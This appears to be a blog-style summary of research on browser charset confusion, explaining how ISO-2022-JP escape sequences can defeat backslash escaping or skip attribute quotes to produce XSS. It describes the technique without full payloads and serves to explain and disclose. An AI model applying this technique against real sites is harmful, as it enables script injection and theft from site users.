Encoding Differentials: Why Charset Matters

Full Report

In the wide world of technology, there are many different byte encoding standards such as UTF-8, UTF-16 and Big5. In particular, we need a way to map bytes to characters. When we do this, there is an encoding on the server side from one charset to bytes and another charset to decode it, where most of the times these are the same. This article finds a crazy bug in modern browsers that can lead to XSS and other issues. In HTTP, the charset attribute can be set on the Content-Type header, the meta tag within the HTML and finally the byte order mark of U+FeFF. If the browser can't determine the charset from the header, then it does some auto detection on it. The idea of the attack is to get data sent to the browser as one character type but then interpreted as another when the browser receives it. Back in the day, this was used to get XSS via a UTF-7 encoding on Google. Modern browsers have banned UTF-7 though and most charsets aren't helpful for smuggling in characters, except one. The ISO-2022-JP is a Japanese character encoding that must be supported. If a byte sequence of 0x1b 0x28 0x42 tell the charset to decode the next set of bytes as ASCII instead of the JP charset. What's even better, is that Chrome and Firefox will both autodetect this encoding for us to cause havoc. The first attack they do is via negating backslash escaping. This requires having input at the top and bottom of the file, where double quotes are backslash escaped on the server side, preventing XSS. Once the escape sequence is added, the browser will switch from ASCII (the default in the mode) to Japanese character set. When this happens, most of the standard ASCII is the same besides two chars: 0x5C and 0x7E. 0x5C is the yen character in this charset instead of the backslash! So, instead of the browser seeing a backslash in this encoding, it sees the yen! Now, we can execute arbitrary JS because we escaped the string. That's pretty neat! The second technique is when data is controlled in two separate locations within an HTML tag, such as an attribute or plaintext section. The idea is to switch from ASCII to the JP one in the attribute. Then, within the plaintext, switch it back to ASCII. Since the double quote of the attribute was effectively skipped with the charset change, we're now INSIDE of the attribute with this data. After this, an attribute (because of the closing double quote) will be treated as HTML when it shouldn't be. Pretty neat! How do we trigger the browser to see this encoding? According to the authors, direct control over the charset or via a meta tag is nice. If the charset isn't added, the auto detection finds it super easy, according to the author. I'm guessing that it looks for the escape sequences is all. Overall, a great post on the complications of character encodings in the browser. The browsers ability to help the web page has once again added a security mishap to the world.

Analysis Summary